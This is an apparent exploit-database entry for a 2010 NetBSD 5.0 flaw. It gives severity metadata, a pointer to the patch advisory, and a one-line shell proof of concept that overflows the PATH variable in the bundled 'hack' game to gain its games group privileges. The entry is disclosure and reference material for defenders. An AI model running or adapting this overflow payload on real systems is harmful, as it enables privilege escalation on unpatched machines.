hack rougelike game PATH stack overflow

vendor:

NetBSD Distributions

by:

JMIT

7,5

CVSS

HIGH

Stack Overflow

120

CWE

Product Name: NetBSD Distributions

Affected Version From: NetBSD 5.0

Affected Version To: NetBSD 5.0 and below

Patch Exists: YES

Related CWE: Not available. See NetBSD-SA2009-007

CPE: NetBSD

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: NetBSD 5.0-RELEASE

2010

hack rougelike game PATH stack overflow

NetBSD 5.0 and below Hack PATH Environment overflow proof of concept. Successfull Exploitation gives guid 100 (games). Vulnerable Function is in hack.unix.c. It is a basic strcpy stack overflow. Such overflows are hard to exploit in NetBSD.

Mitigation:

Apply the patch provided by NetBSD-SA2009-007

Source

Exploit-DB raw data:

#!/bin/sh

# NetBSD 5.0 and below Hack PATH Environment overflow proof of concept
# Successfull Exploitation gives guid 100 (games)
# Vulnerable Function is in hack.unix.c
# It is a basic strcpy stack overflow. Such overflows are hard to exploit in
# NetBSD. If you can exploit it successfully feel free to contact me
# Original Advisorie: NetBSD-SA2009-007

# Title: hack rougelike game PATH stack overflow
# Author: JMIT (office@johannesmaria.at)
# Date: 18. May 2010
# Software Link: Contained in all NetBSD Distributions as default
# Version: NetBSD 5.0 and below
# Tested on: NetBSD 5.0-RELEASE
# CVE: Not available. See NetBSD-SA2009-007
# Code:

export PATH=`/usr/pkg/bin/perl -e 'printf("A"x1000);printf("\x41\xb0\xe5\xbf\xbf"x15);'`:/bin:/usr/bin:/usr/sbin:/sbin:/usr/games && hack